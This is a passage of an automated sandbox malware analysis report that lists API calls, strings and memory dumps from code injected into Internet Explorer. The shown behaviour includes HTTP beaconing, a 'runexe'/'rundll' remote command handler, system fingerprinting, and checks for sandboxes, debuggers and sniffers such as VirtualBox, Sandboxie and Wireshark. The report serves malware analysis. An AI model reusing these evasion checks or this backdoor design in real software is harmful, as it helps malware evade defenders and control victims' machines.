      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 004F17DC
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
      • Part of subcall function 00514548: memset.MSVCRT ref: 00514583
      • Part of subcall function 00514548: GetLocalTime.KERNEL32(?,00000000,?,00000000), ref: 005145A6
      • Part of subcall function 00514548: GetNativeSystemInfo.KERNEL32(?), ref: 005145EB
      • Part of subcall function 00514548: memset.MSVCRT ref: 00514681
    • rand.MSVCRT ref: 0051479C
    • ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 005190CF: ??2@YAPAXI@Z.MSVCRT ref: 0051910D
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 0051911A
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519127
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519141
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 00519159
      • Part of subcall function 005190CF: ??3@YAXPAX@Z.MSVCRT ref: 005191AD
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 0051481E
    • ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 005130ED: WinHttpReceiveResponse.WINHTTP(?,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513167
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513171
      • Part of subcall function 005130ED: WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000,000004A9,000003E9,0000D10B,00000000,00000000,000003E9,?,?), ref: 00513188
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513192
      • Part of subcall function 005130ED: WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D0
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D2
      • Part of subcall function 005130ED: WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131EC
      • Part of subcall function 005130ED: _wtoi.MSVCRT ref: 005131F2
      • Part of subcall function 005130ED: WinHttpQueryAuthSchemes.WINHTTP(?,?,?,:EQ,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051323C
      • Part of subcall function 005130ED: WinHttpSetCredentials.WINHTTP(?,:EQ,?,00000729,0000075B,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051325A
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
    • ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
    • CloseHandle.KERNEL32(00000000), ref: 0051499A
    • ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • ??3@YAXPAX@Z.MSVCRT ref: 005149CD
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 005149AF
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005110AB
    • memset.MSVCRT ref: 005110B5
    • UrlMkGetSessionOption.URLMON(10000001,00000000,00000104,?,00000000), ref: 005110C9
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00511080,00000104,?,?,00511094,?,?,?,?,?,?,?), ref: 005110F0
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 00511117
    Strings
    • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;, xrefs: 00511100
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 005166E9: IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
      • Part of subcall function 005166E9: GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    • _strdup.MSVCRT(?,?,?,?,?,00020019,?,?,?,?,00020019,?,?,?,00000000,00020019), ref: 00516AEA
    • _strdup.MSVCRT(?,?,?,?,?,00020019,?,?,?,?,00020019,?,?,?,?,00020019), ref: 00516B65
    • realloc.MSVCRT ref: 00516BD0
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516C7E
    • realloc.MSVCRT ref: 00516CC2
    • RegCloseKey.ADVAPI32(?), ref: 00516D18
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00516667: RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1A8C
    • memset.MSVCRT ref: 004F1A9C
    • memcpy.MSVCRT ref: 004F1AB8
    • memcpy.MSVCRT ref: 004F1AE9
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1AFE
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1B1B
      • Part of subcall function 004F1B6D: __EH_prolog3_GS.LIBCMT ref: 004F1B77
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
      • Part of subcall function 004F1B6D: memset.MSVCRT ref: 004F1BD6
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
      • Part of subcall function 004F1B6D: memcpy.MSVCRT ref: 004F1C63
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00514C9D
    • WSAStartup.WS2_32(00000002,?), ref: 00514CAE
    • gethostname.WS2_32(00000000,00000100), ref: 00514CC3
    • gethostbyname.WS2_32(00000000), ref: 00514CD3
    • inet_ntoa.WS2_32(?), ref: 00514CE3
    • WSACleanup.WS2_32 ref: 00514CF2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005144D4
    • memset.MSVCRT ref: 005144E0
    • memcpy.MSVCRT ref: 005144F8
    • ??3@YAXPAX@Z.MSVCRT ref: 00514516
    • ??3@YAXPAX@Z.MSVCRT ref: 00514520
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • __EH_prolog3_GS.LIBCMT ref: 004F1B77
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
    • memset.MSVCRT ref: 004F1BD6
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
    • memcpy.MSVCRT ref: 004F1C63
      • Part of subcall function 004F1A3C: __EH_prolog3.LIBCMT ref: 004F1A43
      • Part of subcall function 004F1A3C: ??3@YAXPAX@Z.MSVCRT ref: 004F1A52
      • Part of subcall function 004F1A3C: ??3@YAXPAX@Z.MSVCRT ref: 004F1A5E
      • Part of subcall function 004F1FDE: ??2@YAPAXI@Z.MSVCRT ref: 004F1FE3
      • Part of subcall function 004F1FDE: ??2@YAPAXI@Z.MSVCRT ref: 004F2015
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00513E74,00000000,00000000,?), ref: 00511B60
    • GetLastError.KERNEL32 ref: 00511B6C
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    • OpenHttpByNoProxy WinHttpOpen Failed! - %d, xrefs: 00511B73
    • Try Http by no proxy., xrefs: 00511B4B
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 004F1625
    • MapViewOfFile.KERNELBASE(00000000,00000022,00000000,00000000,00000000), ref: 004F1634
      • Part of subcall function 004F1864: memmove.MSVCRT ref: 004F1879
      • Part of subcall function 004F1864: memmove.MSVCRT ref: 004F18B2
      • Part of subcall function 004F1694: memset.MSVCRT ref: 004F16EA
      • Part of subcall function 004F1694: GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 004F171B
      • Part of subcall function 004F1694: GetLastError.KERNEL32(?,00000000,00000000), ref: 004F1728
      • Part of subcall function 004F1694: LoadLibraryExA.KERNELBASE(?,00000000,00000008,?,00000000,00000000), ref: 004F1736
      • Part of subcall function 004F1694: GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 004F176C
      • Part of subcall function 004F1694: GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 004F178C
      • Part of subcall function 004F1694: GetLastError.KERNEL32(?,00000000,00000000), ref: 004F17DC
    • UnmapViewOfFile.KERNEL32(?), ref: 004F1657
    • CloseHandle.KERNEL32(?), ref: 004F1660
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
      • Part of subcall function 00516667: RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
    • RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • time.MSVCRT ref: 00511080
    • srand.MSVCRT ref: 00511086
      • Part of subcall function 00511098: ??2@YAPAXI@Z.MSVCRT ref: 005110AB
      • Part of subcall function 00511098: memset.MSVCRT ref: 005110B5
      • Part of subcall function 00511098: UrlMkGetSessionOption.URLMON(10000001,00000000,00000104,?,00000000), ref: 005110C9
      • Part of subcall function 00511098: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00511080,00000104,?,?,00511094,?,?,?,?,?,?,?), ref: 005110F0
      • Part of subcall function 00511098: ??3@YAXPAX@Z.MSVCRT ref: 00511117
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
    • GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Non-executed Functions

    APIs
    • memset.MSVCRT ref: 005154C7
    • ___swprintf_l.LIBCMT ref: 005154DA
    • strncmp.MSVCRT(?,runexe ,00000007,?,?,[%s],?,?,00000000,000001FF), ref: 005154E7
    • strncmp.MSVCRT(?,rundll ,00000007,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051555C
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • strstr.MSVCRT ref: 005155DB
    • LoadLibraryA.KERNEL32(?), ref: 005155F9
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051562D
    • ___swprintf_l.LIBCMT ref: 00515645
    • GetProcAddress.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001), ref: 00515664
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 00515698
    • ___swprintf_l.LIBCMT ref: 005156F8
    • GetSystemDirectoryA.KERNEL32(?,00000200), ref: 00515736
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005157B6
    • GetLastError.KERNEL32 ref: 005157C0
    • ___swprintf_l.LIBCMT ref: 00515808
    • memset.MSVCRT ref: 00515831
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 00515896
    • WaitForSingleObject.KERNEL32(?,?), ref: 005158BD
    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 005158F4
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00515922
    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 0051594B
    • memset.MSVCRT ref: 00515964
    • CloseHandle.KERNEL32(?), ref: 0051597A
    • CloseHandle.KERNEL32(?), ref: 00515982
    • CloseHandle.KERNEL32(?), ref: 00515992
    • CloseHandle.KERNEL32(?), ref: 0051599A
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 0051154A
    • memset.MSVCRT ref: 00511561
    • memset.MSVCRT ref: 00511578
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
    • ___swprintf_l.LIBCMT ref: 005115E4
    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • memset.MSVCRT ref: 0051167E
    • memset.MSVCRT ref: 00511695
    • _wfopen.MSVCRT ref: 0051177A
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • fgetws.MSVCRT ref: 005117B1
    • wcsstr.MSVCRT ref: 005117C6
    • wcsstr.MSVCRT ref: 0051185A
    • _wtoi.MSVCRT ref: 00511881
    • feof.MSVCRT ref: 00511893
    • fclose.MSVCRT ref: 005118A7
    • ___swprintf_l.LIBCMT ref: 005118E3
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F2A2A
    • memset.MSVCRT ref: 004F2A51
    • memset.MSVCRT ref: 004F2A6C
    • Process32FirstW.KERNEL32(?,?), ref: 004F2A7E
    • ___swprintf_l.LIBCMT ref: 004F2AA4
      • Part of subcall function 004F3197: _errno.MSVCRT ref: 004F31A4
      • Part of subcall function 004F3197: _wcslwr.MSVCRT ref: 004F31D6
    • Process32NextW.KERNEL32(?,?), ref: 004F2F6A
    • CloseHandle.KERNEL32(?), ref: 004F2F81
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F2FC4
    • memset.MSVCRT ref: 004F2FD4
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004F2FE8
    • ??3@YAXPAX@Z.MSVCRT ref: 004F2FF5
    • ??2@YAPAXI@Z.MSVCRT ref: 004F2FFD
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004F300B
    • memset.MSVCRT ref: 004F3021
    • ___swprintf_l.LIBCMT ref: 004F3078
    • ??3@YAXPAX@Z.MSVCRT ref: 004F309C
    • strstr.MSVCRT ref: 004F30AB
    • strstr.MSVCRT ref: 004F30C1
    • strstr.MSVCRT ref: 004F30D5
    • strstr.MSVCRT ref: 004F30E9
    • strstr.MSVCRT ref: 004F30FD
    • strstr.MSVCRT ref: 004F3111
    • strstr.MSVCRT ref: 004F3125
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,004F64AC,00000000,00020019,?,00000001,00000000,?), ref: 004F299F
    • RegCloseKey.ADVAPI32(?), ref: 004F29A8
    • RegOpenKeyExW.ADVAPI32(80000002,004F66B8,00000000,00020019,?,00000001,00000000,?), ref: 004F29DF
    • RegCloseKey.ADVAPI32(?), ref: 004F29E8
    Strings
    • SYSTEM\CurrentControlSet\Services\IRIS5, xrefs: 004F2950
    • Software\eEye Digital Security, xrefs: 004F2926
    • Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32, xrefs: 004F2934
    • Software\CommView, xrefs: 004F291F
    • SOFTWARE\ZxSniffer, xrefs: 004F295E
    • Software\Syser Soft, xrefs: 004F293B
    • SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie, xrefs: 004F2973
    • Software\Classes\Folder\shell\sandbox, xrefs: 004F2942
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark, xrefs: 004F2957
    • Software\Classes\*\shell\sandbox, xrefs: 004F2949
    • SYSTEM\CurrentControlSet\Services\VBoxGuest, xrefs: 004F2965
    • Software\Win Sniffer, xrefs: 004F292D
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions, xrefs: 004F296C
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\ControlSet001\services\Disk\Enum,00000000,00020019,?,?), ref: 004F281A
    • GetLastError.KERNEL32 ref: 004F2824
    • printf.MSVCRT ref: 004F2830
    • memset.MSVCRT ref: 004F2852
    • RegQueryValueExW.ADVAPI32(?,004F646C,00000000,00000000,?,?), ref: 004F286C
    • wcsstr.MSVCRT ref: 004F288B
    • wcsstr.MSVCRT ref: 004F28A2
    • wcsstr.MSVCRT ref: 004F28B8
    • wcsstr.MSVCRT ref: 004F28CE
    • RegCloseKey.ADVAPI32(?), ref: 004F28DE
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
      • Part of subcall function 004F3197: _errno.MSVCRT ref: 004F31A4
      • Part of subcall function 004F3197: _wcslwr.MSVCRT ref: 004F31D6
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00514AC6
    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AD6
    • ??3@YAXPAX@Z.MSVCRT ref: 00514AE1
    • ??2@YAPAXI@Z.MSVCRT ref: 00514AE9
    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AFA
    • ??3@YAXPAX@Z.MSVCRT ref: 00514B71
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00512D12
      • Part of subcall function 005190CF: ??2@YAPAXI@Z.MSVCRT ref: 0051910D
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 0051911A
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519127
